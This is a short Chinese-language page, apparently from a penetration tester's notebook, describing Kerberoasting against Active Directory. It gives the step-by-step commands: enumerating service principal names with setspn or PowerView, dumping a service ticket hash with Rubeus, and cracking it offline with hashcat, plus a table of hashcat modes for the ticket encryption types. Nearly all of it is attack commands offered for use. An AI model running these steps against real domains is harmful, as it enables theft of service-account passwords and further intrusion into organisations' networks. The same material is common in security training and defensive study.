# kerberoasting

#### 攻击原理

在第二部分中的TGS是`server hash`加密的，可以爆破服务账户的hash，而任何有效的**域用户**都可以请求任何域服务的 kerberos 票证 （ST）

#### 利用

* 发现spn

```
setspn -Q */*

或者powerivew
Get-NetUser -SPN

```

<figure><img src="https://2474992116-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fo0gnu7SjwiL85l4AHJtG%2Fuploads%2FwQO0CatDb438pesRVpMe%2F1673492396728.png?alt=media&#x26;token=f475646e-6eb3-488e-9d52-b4ff9eee3194" alt=""><figcaption></figcaption></figure>

![](C:%5CUsers%5Cice%5CDesktop%5CRain1_lce%5C%E5%9B%BE%E7%89%87%5C1673492396728.png)

* 直接执行Rubeus获取hash

```
.\Rubeus.exe kerberoast /user:fileserver /nowrap
```

<figure><img src="https://2474992116-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fo0gnu7SjwiL85l4AHJtG%2Fuploads%2FKNCrqJVkVYyFV1RLImIz%2F1673494181227.png?alt=media&#x26;token=8afb4b2c-10e9-4cdd-82da-57512fa35391" alt=""><figcaption></figcaption></figure>

![](C:%5CUsers%5Cice%5CDesktop%5CRain1_lce%5C%E5%9B%BE%E7%89%87%5C1673494181227.png)

* 到hashcat破解

```
hashcat.exe -m 13100 spnhash.txt pwd.txt --force
```

<figure><img src="https://2474992116-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fo0gnu7SjwiL85l4AHJtG%2Fuploads%2FPowdhygKfKjqBtk84tTM%2F1673494360047.png?alt=media&#x26;token=973baf0e-fdac-4ba3-b632-331ed0ddf018" alt=""><figcaption></figcaption></figure>

![](C:%5CUsers%5Cice%5CDesktop%5CRain1_lce%5C%E5%9B%BE%E7%89%87%5C1673494360047.png)

注意：

hashcat要使用正确的模式破解

| 模式      | 描述                                                    |
| ------- | ----------------------------------------------------- |
| `13100` | Kerberos 5 TGS-REP etype 23 （RC4）                     |
| `19600` | Kerberos 5 TGS-REP etype 17 （AES128-CTS-HMAC-SHA1-96） |
| `19700` | Kerberos 5 TGS-REP etype 18 （AES256-CTS-HMAC-SHA1-96） |